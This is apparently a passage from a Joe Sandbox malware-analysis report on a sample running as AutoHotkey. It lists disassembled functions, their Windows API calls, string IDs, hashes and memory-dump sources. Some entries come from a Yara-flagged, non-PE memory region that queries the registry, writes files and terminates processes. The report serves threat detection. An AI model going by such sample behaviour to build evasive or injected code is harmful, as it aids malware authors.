                                      • API String ID: 1623861271-3288809988
                                      • Opcode ID: ec6d875b76f5743fe2b10a3431b8053dee00b045df26903fa1f060ed728629ac
                                      • Instruction ID: 132dffe664e024bb5c2583ca6da2a2e01c136fcff41b0dc87331aba71bd6e7c5
                                      • Opcode Fuzzy Hash: ec6d875b76f5743fe2b10a3431b8053dee00b045df26903fa1f060ed728629ac
                                      • Instruction Fuzzy Hash: 32E1CF31604341CFD724CF18D8A4B6AB7E1EB89314F145B6FE8498B3A1D779E881CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00431B19 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 198windowclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                      • String ID: v1j
                                      • API String ID: 1623861271-3288809988
                                      • Opcode ID: 8c8b7718764f34e54e0668513aaba27ce4404210dc5117919ee7535baa89316c
                                      • Instruction ID: 62f22c898de131cd45a934dd862476dbbfc6fb8e9f14a0bf904b656a1b10db3e
                                      • Opcode Fuzzy Hash: 8c8b7718764f34e54e0668513aaba27ce4404210dc5117919ee7535baa89316c
                                      • Instruction Fuzzy Hash: D771C431505241CBDB24CF64D8A476AB7E1EB4D318F24276FE4568B3E1D378A881CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D690 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 175comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0041D8DC
                                      • InitializeCriticalSection.KERNEL32(004D85F4,004DA728), ref: 0041D99D
                                      • OleInitialize.OLE32(00000000), ref: 0041D9A4
                                        • Part of subcall function 0041EB40: _wcsncpy.LIBCMT ref: 0041EB94
                                        • Part of subcall function 0041EB40: SetCurrentDirectoryW.KERNEL32(004B0CF8,00000000,004DA6A0,004DA6A0,00000000), ref: 0041EC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Initialize$CriticalCurrentDirectorySection_memset_wcsncpy
                                      • String ID: Clipboard$No tray mem$OU@$Tray
                                      • API String ID: 1348406673-106978176
                                      • Opcode ID: 857b7b82d80a3cff33b9350a7bfe815733e11f48f16bc4729da09dfe9775ca05
                                      • Instruction ID: 6afa78df98753c373e6af0059bf7c5f161b21597b71d9aec5a4e44b034e9a5f5
                                      • Opcode Fuzzy Hash: 857b7b82d80a3cff33b9350a7bfe815733e11f48f16bc4729da09dfe9775ca05
                                      • Instruction Fuzzy Hash: 2E81CDB2907380DAC310CF1AACA965ABBF4F749744B9686BFD05887361C7784454CF9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00451080 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 172memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ErrorLast$AllocVirtual__itow
                                      • String ID: 0$DllCall
                                      • API String ID: 1132559366-1800201163
                                      • Opcode ID: 6526fdc36a5729697fe104dbb7a38d01a64fcdf3698366028a24c1643c9ea077
                                      • Instruction ID: 97e51f85f288f7df93021d39dfbe73acebd7c0b91efe73e9ad3ef109a337fe02
                                      • Opcode Fuzzy Hash: 6526fdc36a5729697fe104dbb7a38d01a64fcdf3698366028a24c1643c9ea077
                                      • Instruction Fuzzy Hash: CB6182B0E01208DFDF14CF98D885BAEBBB4FB08315F20426AE915A73A1D7785845CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00431769 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160windowclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • GetTickCount.KERNEL32 ref: 00430B94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                      • String ID: v1j
                                      • API String ID: 1623861271-3288809988
                                      • Opcode ID: 7d01cc2e55f2f2a5396af62285c3deaa0efd4267d2ab519a5fca75dcf6636b37
                                      • Instruction ID: 7a1efd68fd9881e8ab5ba3e2a02fedf52d28dbd9d965bd1842ddb91ef4da152f
                                      • Opcode Fuzzy Hash: 7d01cc2e55f2f2a5396af62285c3deaa0efd4267d2ab519a5fca75dcf6636b37
                                      • Instruction Fuzzy Hash: 3451D831505241CBDB24DF64ECA876A7BA1EB4D318F24276FE4558B3E1C378A881CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00430B58 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseGlobalUnlock
                                      • String ID: v1j
                                      • API String ID: 1740844442-3288809988
                                      • Opcode ID: 8ae004596be2c917d53da224fb9ab70e3914472bf9500bf870aa9d7be10f5720
                                      • Instruction ID: ae8bd58843cf7bf44b027188a16a8c9db86b53cea469b34f2be486d59955cc34
                                      • Opcode Fuzzy Hash: 8ae004596be2c917d53da224fb9ab70e3914472bf9500bf870aa9d7be10f5720
                                      • Instruction Fuzzy Hash: BE51E831505241CBDB24DF64ECA876A7BA1EB4D318F14276FE4558B3E1C378A880CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004661BA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free$CountTickTimer_malloc
                                      • String ID: Out of memory.
                                      • API String ID: 1890322348-4087320997
                                      • Opcode ID: 1a315e39e4fa2177a8afeb95969c62b4308369ff3a20e9d81c36d63ac81ddce6
                                      • Instruction ID: fe16b79cc7c962063084ee71072ee5d8b804547bf2e81d51d7a89d8302989c6c
                                      • Opcode Fuzzy Hash: 1a315e39e4fa2177a8afeb95969c62b4308369ff3a20e9d81c36d63ac81ddce6
                                      • Instruction Fuzzy Hash: A841A571A062019FDB109F29F8807AA7BE0E784315F19453BE885D3250EB79C95ACF9F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00463C8D Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: @oM
                                      • API String ID: 4104443479-1708334743
                                      • Opcode ID: 8ca462ccea4f09e7ed3f6d0956d08def34de915acddaddbcb7be33b10c84c3b8
                                      • Instruction ID: 5e98bab9c166f0a202d8b0d6cba12ce3acfa1a9217b36d403b81750b656f27b2
                                      • Opcode Fuzzy Hash: 8ca462ccea4f09e7ed3f6d0956d08def34de915acddaddbcb7be33b10c84c3b8
                                      • Instruction Fuzzy Hash: 23C1AF70A00A14CBDF24CF55C885B6AB7B1AF45714F28819BE8059F395E778DC81CB9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00466316 Relevance: 4.6, APIs: 3, Instructions: 113timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00466490
                                      • GetTickCount.KERNEL32 ref: 004664C9
                                      • SetTimer.USER32(0002044A,0000000D,00002710,00446BB0), ref: 004664FF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTickTimer_free
                                      • String ID:
                                      • API String ID: 4185866143-0
                                      • Opcode ID: ad33ac57b72d59aa90bbd664afa06d08a268b1f225ad4fcf0a97781ee8a4a10b
                                      • Instruction ID: 35cb573fa4c1e07c2f644300afc3854e8720968d066ee5e8e85e5eb6887dc83f
                                      • Opcode Fuzzy Hash: ad33ac57b72d59aa90bbd664afa06d08a268b1f225ad4fcf0a97781ee8a4a10b
                                      • Instruction Fuzzy Hash: 10418F71509340DFD710DF15E894BAB7BE4AB84708F09856FE88597350EB38D985CB4B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00466382 Relevance: 4.6, APIs: 3, Instructions: 111timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00466490
                                      • GetTickCount.KERNEL32 ref: 004664C9
                                      • SetTimer.USER32(0002044A,0000000D,00002710,00446BB0), ref: 004664FF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTickTimer_free
                                      • String ID:
                                      • API String ID: 4185866143-0
                                      • Opcode ID: d9f95228d800ca3075c674674cdb42bdf37adbf6300ed46792d6929325df2ecc
                                      • Instruction ID: 01c7bb76e8e0bc40825685d81738a1852442c762348f7bbb3a74d180bf6c97d4
                                      • Opcode Fuzzy Hash: d9f95228d800ca3075c674674cdb42bdf37adbf6300ed46792d6929325df2ecc
                                      • Instruction Fuzzy Hash: E541ED70509240DFDB10DF24E880B9BBBE5AB95304F09892FE88587354E738D986CB5F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004662FE Relevance: 4.6, APIs: 3, Instructions: 85timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00466490
                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      • GetTickCount.KERNEL32 ref: 004664C9
                                      • SetTimer.USER32(0002044A,0000000D,00002710,00446BB0), ref: 004664FF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountErrorFreeHeapLastTickTimer_free
                                      • String ID:
                                      • API String ID: 2937406964-0
                                      • Opcode ID: 19e9682df60a7aa0ab44984f32fbf0816d0052ea2be4ac951366ee02a7b41340
                                      • Instruction ID: fbe660ab59d1c16caad6faaf06460ae0cd23b714aefe5515e173963e903f2271
                                      • Opcode Fuzzy Hash: 19e9682df60a7aa0ab44984f32fbf0816d0052ea2be4ac951366ee02a7b41340
                                      • Instruction Fuzzy Hash: A7315BB1509240DFD710DF25E884B9B7BE5BB84708F098A2FF88596250E738D949CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004662D8 Relevance: 4.6, APIs: 3, Instructions: 83timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00466490
                                      • GetTickCount.KERNEL32 ref: 004664C9
                                      • SetTimer.USER32(0002044A,0000000D,00002710,00446BB0), ref: 004664FF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTickTimer_free
                                      • String ID:
                                      • API String ID: 4185866143-0
                                      • Opcode ID: bbc31d1e325bd0e862d4c5195a027f65ddc92fb53bac4f826f21b41502aa6c99
                                      • Instruction ID: 965edcf29228e748a8bce1cae2abfd0d5af824b2297bd87d49fc2bfde01b466b
                                      • Opcode Fuzzy Hash: bbc31d1e325bd0e862d4c5195a027f65ddc92fb53bac4f826f21b41502aa6c99
                                      • Instruction Fuzzy Hash: 693169B1509240DFD710DF25E884B9BBBE5EB84708F08892FF88596250EB38D945CB9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04875071 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020119,?,?,?,?,?,04871722,?,00000000,04871885,?,?,00000000), ref: 048750B7
                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,80000002,00000000,00000000,00020119,?,?,?,?,?,04871722), ref: 048750DE
                                      • RegCloseKey.ADVAPI32(?,80000002,00000000,00000000,00020119,?,?,?,?,?,04871722,?,00000000,04871885), ref: 04875103
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 74b2d28ce19a860730b65e831c662c2118fa86ed3135638d7fc046ceee5fbe1f
                                      • Instruction ID: ba853a9cda2ff4af5f8c4d2d93cb48311aafaa4850d099a3c276c64dc7276c6d
                                      • Opcode Fuzzy Hash: 74b2d28ce19a860730b65e831c662c2118fa86ed3135638d7fc046ceee5fbe1f
                                      • Instruction Fuzzy Hash: 5E113371A0021C7BDB10EE9DDC81EEEB3ACAB48315F004A75EA14D7240E7B0AA4547A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0487459D Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621,?,?,?,00000001), ref: 048745E2
                                      • WriteFile.KERNEL32(00000000,?,00000000,048746A2,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621), ref: 048745FA
                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000000,048746A2,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621), ref: 04874606
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleWrite
                                      • String ID:
                                      • API String ID: 1065093856-0
                                      • Opcode ID: 096b4bf337662dd24fe8b8ec3481f46f1df1887deb03310bd003a285ce157e95
                                      • Instruction ID: 5e318058a835d626c74daadaf24fffc54665d53fab38422bf4dcdab47144b48c
                                      • Opcode Fuzzy Hash: 096b4bf337662dd24fe8b8ec3481f46f1df1887deb03310bd003a285ce157e95
                                      • Instruction Fuzzy Hash: E801B171604308BFF721AAAC8C92FAEB7ACDB85F18F614F75B510E25D0D7B4AD004965
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404250 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00000001,?,?,?,?,00404316), ref: 00404256
                                        • Part of subcall function 0044B8F0: GetCurrentDirectoryW.KERNEL32(00008000,00404316,?,00404263,?,?,?,?,00404316), ref: 0044B907
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryErrorMode
                                      • String ID: Out of memory.
                                      • API String ID: 3557233301-4087320997
                                      • Opcode ID: b0c70859a60a6403659dcb806d2b0f406f2108c8162651e15fa6e0f0477860ea
                                      • Instruction ID: 38425df4af83a61dfd6fa476d200fd4f80910d7d70234c3cd8a878932f239f92
                                      • Opcode Fuzzy Hash: b0c70859a60a6403659dcb806d2b0f406f2108c8162651e15fa6e0f0477860ea
                                      • Instruction Fuzzy Hash: 6211256670060457C7206F66A841A9B3798EBC13A8B05457FFE05AB3D1EB7DEE0482ED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04875E39 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000000,?,?,?,?,0485BD21,00000000,0485C1F0,?,?,00000000,00000000), ref: 04875E7B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID: GetFileAttributesA
                                      • API String ID: 3188754299-811605020
                                      • Opcode ID: e575bd19392b61a5ff8e77ec741784582c2e9c9a5e54f61aae10fd08876fc5d8
                                      • Instruction ID: 32a710cf2e54cf106a13f537983dd7ef5d7a2d857259709809ec7dd162db93df
                                      • Opcode Fuzzy Hash: e575bd19392b61a5ff8e77ec741784582c2e9c9a5e54f61aae10fd08876fc5d8
                                      • Instruction Fuzzy Hash: EAF06272A04308FFE700DBB9DCA595E77E8EB45714B905E74E500D3A50E6B9FD00EA11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 048758BD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?,0487595B,00000000,04875973,?,?,?,?,04874FE2,?,048685A4), ref: 048758F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID: CreateDirectoryA
                                      • API String ID: 4241100979-2169353901
                                      • Opcode ID: a5debc341c426f9dc9bb7076f08103ed6ed36ba27db9c9c6dca26a7b3ff69496
                                      • Instruction ID: af7d78cfeae678a37b3f3482c58246db158713a85aa7f9139424c7aaae124a2d
                                      • Opcode Fuzzy Hash: a5debc341c426f9dc9bb7076f08103ed6ed36ba27db9c9c6dca26a7b3ff69496
                                      • Instruction Fuzzy Hash: 44F05E71614208BFE701DBA9EC52E1EB7E8E749610B914D70E500D3A01E6B9AE109A21
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04875749 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • TerminateProcess.KERNELBASE(00000000,00000000,?,00000001,04875243,0486DF05,00000000,00000000,00000002,00000000,00000000,00000000,00000002,00000000,0486E219,00000000), ref: 04875762
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID: TerminateProcess
                                      • API String ID: 560597551-2873147277
                                      • Opcode ID: a1d759ef0838d5e94b480a8ea30e2e9151bbf1f0e3b9a91e5f20ce8f7aded7c2
                                      • Instruction ID: d5d6e21b31b27d14dbb7f458b2d6ca26aad1415e25f5c5bba7b4f58973b01865
                                      • Opcode Fuzzy Hash: a1d759ef0838d5e94b480a8ea30e2e9151bbf1f0e3b9a91e5f20ce8f7aded7c2
                                      • Instruction Fuzzy Hash: 81C04CB2B22220BBB71096E96C88C976BDCEE495A13054D62B615C3601D6A89C505BA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404190 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,00000000,004AC858,000000FF,00408718,?,?,00004001,00000001,0000030C), ref: 004041FA
                                      • _free.LIBCMT ref: 00404215
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
